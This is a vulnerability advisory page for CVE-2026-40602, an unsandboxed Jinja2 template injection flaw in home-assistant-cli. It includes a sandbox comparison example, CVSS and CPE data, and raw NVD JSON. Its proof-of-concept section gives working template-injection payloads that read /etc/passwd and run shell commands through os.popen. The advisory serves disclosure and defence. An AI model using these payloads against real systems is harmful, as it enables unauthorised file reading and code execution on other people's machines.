Security Vulnerability Report
CVE-2026-40602 CVSS 5.6 MEDIUM

CVE-2026-40602

Published: 2026-04-21 18:16:52
Last Modified: 2026-04-27 19:43:27

Description

The Home Assistant Command-line interface (hass-cli) is a command-line tool for Home Assistant. In versions of home-assistant-cli before 1.0.0, an unrestricted environment was used to handle Jinja2 templates instead of a sandboxed one. User-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage. This vulnerability is fixed in 1.0.0.
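The difference between the two environment types named in the description, as an added example that is not taken from hass-cli or its fix. It assumes the Jinja2 package is installed; `render_untrusted`, `compare` and the sample templates are constructed for illustration.

```python
# Added example: the same untrusted template rendered in an unrestricted
# Jinja2 Environment and in a SandboxedEnvironment.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed inputs: an ordinary template, and a harmless probe that only
# asks for a type name through a dunder attribute.
BENIGN = "{{ value | upper }}"
PROBE = "{{ value.__class__.__name__ }}"


def render_untrusted(env, source, **context):
    """Render `source`; return (status, text), status 'rendered' or 'blocked'."""
    try:
        return "rendered", env.from_string(source).render(**context)
    except SecurityError as exc:
        # The sandbox refuses access to underscore-prefixed attributes.
        return "blocked", str(exc)


def compare(source, **context):
    """Render one template in both environment types and collect the results."""
    return {
        "unrestricted": render_untrusted(Environment(), source, **context),
        "sandboxed": render_untrusted(SandboxedEnvironment(), source, **context),
    }


if __name__ == "__main__":
    for name, source in (("benign", BENIGN), ("probe", PROBE)):
        for kind, (status, text) in compare(source, value="kitchen").items():
            print(f"{name:7} {kind:13} {status:9} {text}")
```

Ordinary templates render identically in both environments; only the attribute walk into Python internals is refused by the sandbox.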

CVSS Details

CVSS Score: 5.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:home-assistant-ecosystem:home_assistant_command-line_interface:*:*:*:*:*:*:*:* - VULNERABLE
home-assistant-cli < 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-40602: Jinja2 SSTI in home-assistant-cli
# The vulnerability allows accessing Python's internals due to lack of sandboxing.

# Malicious Jinja2 template payload to read a file (e.g., /etc/passwd)
payload_read = "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('cat /etc/passwd').read() }}"

# Malicious payload to execute a command (e.g., id)
payload_exec = "{{ config.__class__.__init__.__globals__['builtins'].__import__('os').popen('id').read() }}"

# Note: The exact index of subclasses may vary depending on the Python version.
# The key takeaway is that the unrestricted environment allows accessing 'os' and 'sys' modules.
```

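References

https://github.com/home-assistant-ecosystem/home-assistant-cli/pull/453 (Issue Tracking)
https://github.com/home-assistant-ecosystem/home-assistant-cli/security/advisories/GHSA-33qf-q99x-wpm8 (Mitigation, Vendor Advisory)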

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40602", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:51.827", "lastModified": "2026-04-27T19:43:26.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Home Assistant Command-line interface (hass-cli) is a command-line tool for Home Assistant. Up to 1.0.0 of home-assitant-cli an unrestricted environment was used to handle Jninja2 templates instead of a sandboxed one. The user-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage. This vulnerability is fixed in 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.3, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:home-assistant-ecosystem:home_assistant_command-line_interface:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.0", "matchCriteriaId": "07740846-6543-4428-9054-ED1EDD1B003E"}]}]}], "references": [{"url": "https://github.com/home-assistant-ecosystem/home-assistant-cli/pull/453", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/home-assistant-ecosystem/home-assistant-cli/security/advisories/GHSA-33qf-q99x-wpm8", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}